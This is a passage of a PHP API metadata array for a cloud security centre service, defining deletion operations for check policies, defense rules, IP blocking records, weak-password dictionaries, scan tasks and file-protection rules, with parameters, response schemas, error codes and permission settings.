."\n" .'* **STANDARD**: Standard-level policy'."\n" .'* **REQUIREMENT**: Requirement-level policy'."\n" .'* **SECTION**: Section-level policy'."\n", 'type' => 'string', 'required' => true, 'example' => 'STANDARD', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => 'Schema of Response', 'description' => 'The response parameters.'."\n", 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => 'Id of the request', 'description' => 'The unique ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => 'F8B6F758-BCD4-597A-8A2C-DA5A552C****'], 'Policys' => [ 'description' => 'List of deleted policy details.'."\n", 'type' => 'array', 'items' => [ 'description' => 'Deleted policy details.'."\n", 'type' => 'object', 'properties' => [ 'PolicyId' => ['description' => 'Deleted policy ID.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '1000000000001', 'title' => ''], 'PolicyType' => ['description' => 'Policy type for custom check rule:'."\n" ."\n" .'* **STANDARD**: Standard-level policy'."\n" .'* **REQUIREMENT**: Requirement-level policy'."\n" .'* **SECTION**: Section-level policy'."\n", 'type' => 'string', 'example' => 'STANDARD', 'title' => ''], 'PolicyShowName' => ['description' => 'The name of the custom policy.'."\n", 'type' => 'string', 'example' => 'testPolicyName', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'ParamIllegal.%s', 'errorMessage' => 'The parameter %s is invalid, please fill it in again.', 'description' => 'Invalid parameter, please fill in again'], ['errorCode' => 'CspmDeleteCustomPolicyError', 'errorMessage' => 'The dependent policy needs to be disassociated.', 'description' => 'Delete error, dependent dependencies must be disassociated first.'], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'DeleteCheckPolicy', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteCheckPolicy'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'delete', 'ramAction' => [ 'action' => 'yundun-sas:DeleteCheckPolicy', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'CustomCheckStandardPolicy', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:customcheckstandardpolicy/{#customcheckstandardpolicyId}'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"F8B6F758-BCD4-597A-8A2C-DA5A552C****\\",\\n \\"Policys\\": [\\n {\\n \\"PolicyId\\": 1000000000001,\\n \\"PolicyType\\": \\"STANDARD\\",\\n \\"PolicyShowName\\": \\"testPolicyName\\"\\n }\\n ]\\n}","type":"json"}]', ], 'DeleteClientUserDefineRule' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'delete', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '91951', 'abilityTreeNodes' => ['FEATUREsas2XWKXT'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'IdList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The IDs of the custom defense rules.', 'type' => 'array', 'items' => ['description' => 'The ID of the custom defense rule.'."\n" ."\n" .'> You can call the [ListClientUserDefineRules](~~ListClientUserDefineRules~~) operation to query the IDs of custom defense rules.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '140****', 'title' => ''], 'required' => true, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.', 'type' => 'string', 'example' => '4552b59b-18f2-4fad-b6a2-0d59b8f2****', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'InvalidId', 'errorMessage' => 'Invalid ID.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'DeleteClientUserDefineRule', 'summary' => 'Deletes specified custom defense rules.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteClientUserDefineRule'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'delete', 'ramAction' => [ 'action' => 'yundun-sas:DeleteClientUserDefineRule', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"4552b59b-18f2-4fad-b6a2-0d59b8f2****\\"\\n}","type":"json"}]', ], 'DeleteCloudVendorAccountAK' => [ 'summary' => 'Delete multi-cloud asset synchronization configuration.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'delete', 'abilityTreeCode' => '91952', 'abilityTreeNodes' => ['FEATUREsasK0Q1Y8'], ], 'parameters' => [ [ 'name' => 'AuthId', 'in' => 'query', 'schema' => ['description' => 'The unique ID of the AccessKey pair.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '2363', 'title' => ''], ], [ 'name' => 'AuthModules', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The modules that are associated with the AccessKey pair.'."\n", 'type' => 'array', 'items' => ['description' => 'The code of the module.'."\n", 'type' => 'string', 'required' => false, 'example' => 'HOST', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => '4539D402-F7A4-5915-9580-EC227BF*****', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'DeleteCloudVendorAccountAK', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteCloudVendorAccountAK'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'delete', 'ramAction' => [ 'action' => 'yundun-sas:DeleteCloudVendorAccountAK', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"4539D402-F7A4-5915-9580-EC227BF*****\\"\\n}","type":"json"}]', 'translator' => 'machine', ], 'DeleteContainerDefenseRule' => [ 'summary' => 'Deletes a rule for non-image program defense.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'delete', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '162193', 'abilityTreeNodes' => ['FEATUREsasZLVTBH'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'RuleIds', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The IDs of the rules that you want to delete.'."\n" ."\n" .'> You can call the [ListContainerDefenseRule](~~2590599~~) operation to query the rule IDs.'."\n", 'type' => 'array', 'items' => ['description' => 'The rule ID.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '214', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => 'PlainResult', 'description' => 'PlainResult'."\n", 'type' => 'object', 'properties' => [ 'Data' => ['description' => 'The number of deleted rules.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '1', 'title' => ''], 'Success' => ['description' => 'Indicates whether the request was successful. Valid values:'."\n" ."\n" .'* **true**'."\n" .'* **false**'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The status code that is returned. The status code **200** indicates that the request was successful. Other status codes indicate that the request failed. You can identify the cause of the failure based on the status code.'."\n", 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The returned message.'."\n", 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => '47365EC5-**-6DEA1788EB11', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code. The value 200 indicates that the request was successful.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": 1,\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"47365EC5-**-6DEA1788EB11\\",\\n \\"HttpStatusCode\\": 200\\n}","type":"json"}]', 'title' => 'DeleteContainerDefenseRule', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteContainerDefenseRule'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'delete', 'ramAction' => [ 'action' => 'yundun-sas:DeleteContainerDefenseRule', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'ContainerDefenseRule', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:containerdefenserule/{#RuleId}'], ], ], ], ], ], 'DeleteContainerPluginRule' => [ 'summary' => 'Deletes a container escape prevention rule.', 'methods' => ['get', 'post'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'systemTags' => ['operationType' => 'delete'], 'parameters' => [ [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type of the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'RuleId', 'in' => 'query', 'schema' => ['description' => 'The rule ID. You can call the addContainerWebDefenseRule operation to obtain the rule ID.', 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '200022', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'Data' => ['description' => 'Indicates whether the container escape prevention rule is deleted. Valid values:'."\n" .'- **true**: The rule is deleted.'."\n" .'- **false**: The rule failed to be deleted.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'RequestId' => ['description' => 'The unique identifier that Alibaba Cloud generates for the request.', 'type' => 'string', 'example' => 'A4EB8B1C-1DEC-5E18-BCD0-D1BBB3936FA7', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Delete a container escape prevention rule', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteContainerPluginRule'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'delete', 'ramAction' => [ 'action' => 'yundun-sas:DeleteContainerPluginRule', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": true,\\n \\"RequestId\\": \\"A4EB8B1C-1DEC-5E18-BCD0-D1BBB3936FA7\\"\\n}","type":"json"}]', ], 'DeleteCustomBlockRecord' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => ['operationType' => 'delete'], 'parameters' => [ [ 'name' => 'Id', 'in' => 'query', 'schema' => ['description' => 'The ID of the record to delete.'."\n" .'> Call the [DescribeCustomBlockRecords](~~DescribeCustomBlockRecords~~) operation to obtain this parameter.', 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '381**', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique ID for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => 'BE120DAB-F4E7-4C53-ADC3-A97578ABF384', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Delete a custom IP blocking policy', 'summary' => 'Deletes the blocking records of specific IP addresses that are custom-defined on one or more servers.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteCustomBlockRecord'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'delete', 'ramAction' => [ 'action' => 'yundun-sas:DeleteCustomBlockRecord', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"BE120DAB-F4E7-4C53-ADC3-A97578ABF384\\"\\n}","type":"json"}]', ], 'DeleteCustomizeReport' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'delete', 'abilityTreeCode' => '91955', 'abilityTreeNodes' => ['FEATUREsasAT4UY0'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'ReportId', 'in' => 'query', 'schema' => ['description' => 'The report ID.'."\n" .'>Call [DescribeCustomizeReportList](~~DescribeCustomizeReportList~~) to obtain this parameter.', 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '123', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique ID for each request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '90593A3B-85CE-5D87-A430-726D0B87****', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'IllegalParam', 'errorMessage' => 'Illegal param', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Delete a custom security report', 'summary' => 'Deletes a specified custom security report.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteCustomizeReport'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'delete', 'ramAction' => [ 'action' => 'yundun-sas:DeleteCustomizeReport', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"90593A3B-85CE-5D87-A430-726D0B87****\\"\\n}","type":"json"}]', ], 'DeleteCustomizedDict' => [ 'summary' => 'Deletes a custom weak password file.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'delete', 'abilityTreeCode' => '91954', 'abilityTreeNodes' => ['FEATUREsas0XJWFD'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The IP address of the access source.', 'type' => 'string', 'required' => false, 'example' => '123.103.9.***', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request. The ID is a unique identifier that Alibaba Cloud generates for the request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '85B5D55F-B341-528F-A2CA-AB1207F9****', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => '-101', 'errorMessage' => '%s %s', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'title' => 'Delete a custom weak password', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteCustomizedDict'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'delete', 'ramAction' => [ 'action' => 'yundun-sas:DeleteCustomizedDict', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"85B5D55F-B341-528F-A2CA-AB1207F9****\\"\\n}","type":"json"}]', ], 'DeleteCycleTask' => [ 'summary' => 'Deletes an epoch-based scan node, including image scans, emergency vulnerability scanning, and virus scans.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'delete', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasE5WAEJ'], ], 'parameters' => [ [ 'name' => 'ConfigId', 'in' => 'query', 'schema' => ['description' => 'The ID of the configuration.'."\n" .'>Call the [DescribeCycleTaskList](~~DescribeCycleTaskList~~) operation to obtain this parameter.', 'type' => 'string', 'required' => true, 'example' => '435f626256ebf564cf5ba966a539****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique ID for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '7DBB3D54-AF29-5BF4-8B44-9CFA94F50****', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'RdCheckNoPermission', 'errorMessage' => 'Resource directory account verification has no permission.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ['errorCode' => 'RdCheckInnerError', 'errorMessage' => 'Resource directory account service internal error.', 'description' => ''], ], ], 'title' => 'Delete a general scan plan task', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteCycleTask'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'delete', 'ramAction' => [ 'action' => 'yundun-sas:DeleteCycleTask', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'CycleTask', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:cycletask/{#ConfigId}'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"7DBB3D54-AF29-5BF4-8B44-9CFA94F50****\\"\\n}","type":"json"}]', ], 'DeleteDingTalk' => [ 'summary' => 'Deletes a DingTalk chatbot on the DingTalk Chatbot tab of the Notification Settings page.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'delete', 'abilityTreeCode' => '91957', 'abilityTreeNodes' => ['FEATUREsasDM8NT3'], ], 'parameters' => [ [ 'name' => 'Ids', 'in' => 'query', 'schema' => ['description' => 'The ID of the notification from the DingTalk chatbot. Separate multiple IDs with commas (,).'."\n" ."\n" .'> You can call the [DescribeDingTalk](~~DescribeDingTalk~~) operation to query the ID.'."\n", 'type' => 'string', 'required' => true, 'example' => '2170,256', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => 'BF3D4ACB-CE17-559F-B850-490E42CDDC7E', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'DeleteDingTalk', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteDingTalk'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'delete', 'ramAction' => [ 'action' => 'yundun-sas:DeleteDingTalk', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"BF3D4ACB-CE17-559F-B850-490E42CDDC7E\\"\\n}","type":"json"}]', ], 'DeleteFileProtectClientRule' => [ 'summary' => 'Deletes a file protection rule.', 'methods' => ['post'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'delete', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '188795', 'abilityTreeNodes' => ['FEATUREsas4OHMAP'], 'tenantRelevance' => 'tenant', ], 'parameters' => [ [ 'name' => 'SelectAll', 'in' => 'query', 'schema' => ['description' => 'Specifies whether to select all rules.', 'type' => 'boolean', 'required' => true, 'example' => 'true', 'title' => ''], ], [ 'name' => 'IdList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of policy IDs.', 'type' => 'array', 'items' => ['description' => 'The policy ID.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '123', 'title' => ''], 'required' => false, 'maxItems' => 100, 'minItems' => 1, 'title' => '', 'example' => '', ], ], [ 'name' => 'RuleName', 'in' => 'query', 'schema' => ['description' => 'The name of the rule.', 'type' => 'string', 'required' => false, 'example' => 'text-001', 'title' => ''], ], [ 'name' => 'RuleAction', 'in' => 'query', 'schema' => [ 'description' => 'The action to take when the rule is triggered. Valid values:'."\n" ."\n" .'- **monitor**: Alert.'."\n" .'- **block**: Block.'."\n" .'- **pass**: Allow.', 'type' => 'string', 'required' => false, 'enum' => ['block', 'monitor', 'pass'], 'example' => 'pass', 'title' => '', ], ], [ 'name' => 'AlertLevel', 'in' => 'query', 'schema' => [ 'description' => 'The alert notification level. Valid values:'."\n" ."\n" .'- 0: no alert'."\n" ."\n" .'- 1: reminder'."\n" ."\n" .'- 2: suspicious'."\n" ."\n" .'- 3: high-risk.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'enum' => ['0', '1', '2', '3'], 'example' => '0', 'title' => '', ], ], [ 'name' => 'Platform', 'in' => 'query', 'schema' => ['description' => 'The type of the operating system. Valid values:'."\n" ."\n" .'- **windows**: Windows'."\n" .'- **linux**: Linux.', 'type' => 'string', 'required' => false, 'example' => 'linux', 'title' => ''], ], [ 'name' => 'ExcludeIdList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of excluded policy IDs.', 'type' => 'array', 'items' => ['description' => 'The excluded policy ID.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'Schema of Response', 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => '', 'description' => 'Id of the request', 'type' => 'string', 'example' => 'A4EB8B1C-1DEC-5E18-BCD0-D1BBB3936FA7'], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'IllegalParameter', 'errorMessage' => 'Illegal parameter, please check the param.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'Delete a tamper-proofing rule', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'delete', 'ramAction' => [ 'action' => 'yundun-sas:DeleteFileProtectClientRule', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"A4EB8B1C-1DEC-5E18-BCD0-D1BBB3936FA7\\"\\n}","type":"json"}]', ], 'DeleteFileProtectRule' => [ 'summary' => 'Deletes core file monitoring rules.', 'methods' => ['post'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'delete', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '188795', 'abilityTreeNodes' => ['FEATUREsas4OHMAP'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'Id', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The IDs of the core file monitoring rules that you want to delete.'."\n", 'type' => 'array', 'items' => ['description' => 'The ID of the core file monitoring rule that you want to delete.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '11', 'title' => ''], 'required' => false, 'maxItems' => 100, 'minItems' => 1, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => 'Schema of Response', 'description' => 'Schema of Response'."\n", 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => 'Id of the request', 'description' => 'The request ID.'."\n", 'type' => 'string', 'example' => '7FD1C1DC-AA67-510A-A022-5D23310C3658'], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"7FD1C1DC-AA67-510A-A022-5D23310C3658\\"\\n}","type":"json"}]', 'title' => 'DeleteFileProtectRule', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteFileProtectRule'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'delete', 'ramAction' => [ 'action' => 'yundun-sas:DeleteFileProtectRule', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'ClientFileProtect', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:clientfileprotect/{#RuleId}'], ], ], ], ], ], 'DeleteGroup' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 